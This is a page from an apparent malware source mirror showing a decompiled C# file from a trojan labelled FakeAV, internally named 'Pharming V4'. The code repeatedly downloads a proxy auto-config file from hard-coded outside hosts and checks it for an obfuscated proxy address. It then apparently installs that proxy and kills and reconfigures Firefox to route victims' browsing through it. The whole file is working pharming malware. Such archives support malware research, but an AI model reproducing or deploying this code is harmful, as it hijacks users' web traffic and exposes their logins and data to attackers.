ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4121be2648
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/atproxy.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

215 lines
8.0 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Pharming_V4.atproxy
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace Pharming_V4
{
[StandardModule]
internal sealed class atproxy
{
public static string pac1;
public static string pac2;
public static string pac3;
public static string pac4;
public static string pac5;
public static string pacfinal;
public static void atproxy()
{
string tempPath = Path.GetTempPath();
Pharming_V4.atproxy.pac1 = "http://www.tudolinux.com/p.txt";
Pharming_V4.atproxy.pac2 = "http://www.tudolinux.com/p.txt";
Pharming_V4.atproxy.pac3 = "http://www.tudominerim.com/p.txt";
Pharming_V4.atproxy.pac4 = "http://www.tudominerim.com/p.txt";
Pharming_V4.atproxy.pac5 = "http://www.tudominerim.com/p.txt";
Random random = new Random();
while (true)
{
do
{
int num;
do
{
num = random.Next(1, 5);
if (num == 1)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac1, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac1);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac1;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 2)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac2, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac2);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac2;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 3)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac3, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac3);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac3;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 4)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac4, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac4);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac4;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
}
while (num != 5);
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac5, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
while (!System.IO.File.Exists(tempPath + "\\config.jsp"));
StreamReader streamReader1 = new StreamReader(tempPath + "\\config.jsp");
string end1 = streamReader1.ReadToEnd();
streamReader1.Close();
if (end1.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac5);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac5;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink